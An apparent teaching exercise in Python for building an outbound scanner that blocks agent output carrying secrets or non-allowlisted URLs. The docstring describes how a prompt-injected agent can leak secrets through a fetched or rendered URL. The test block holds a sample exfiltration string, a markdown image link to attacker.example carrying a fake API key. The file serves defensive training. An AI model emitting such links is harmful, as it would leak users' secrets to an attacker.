"""add_defense.py: your turn, add one more defense layer: an OUTBOUND content scanner.

Exfiltration does not only happen by email. An injected agent can hide stolen data in a URL it asks
to fetch or render (for example a markdown image link to attacker.example/log?key=SECRET). Build a
scanner that inspects anything about to leave the system and blocks it if it carries a secret or
points at a domain that is not on the allowlist.

Steps:
  1. Finish scan_outbound below: return (allowed, reason).
  2. Test it against a clean string and an exfiltration string.
  3. Run:  python add_defense.py

Worked defenses (detect_injection, wrap_untrusted, redact_secrets, domain_allowed) are in
../solution/defenses.py.
"""

import sys, os, re
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "solution"))
import defenses as D

ALLOWED_DOMAINS = {"ourcompany.example"}


def scan_outbound(text, allowed_domains=ALLOWED_DOMAINS):
    """Return (allowed: bool, reason: str) for content about to leave the system."""
    # TODO 1: if D.redact_secrets(text) != text, a secret is present -> block.
    # TODO 2: find URLs (hint: re.findall(r"https?://([^/\s)]+)", text)); if any host's domain
    #         is not in allowed_domains -> block.
    # TODO 3: otherwise allow.
    raise NotImplementedError("implement the outbound scanner")


if __name__ == "__main__":
    clean = "Summary: customer cannot log in. Following up with the team."
    exfil = "![pixel](http://attacker.example/log?key=sk-ant-FAKE000-this-is-not-a-real-key)"
    print("clean ->", scan_outbound(clean))     # expect (True, ...)
    print("exfil ->", scan_outbound(exfil))     # expect (False, ...)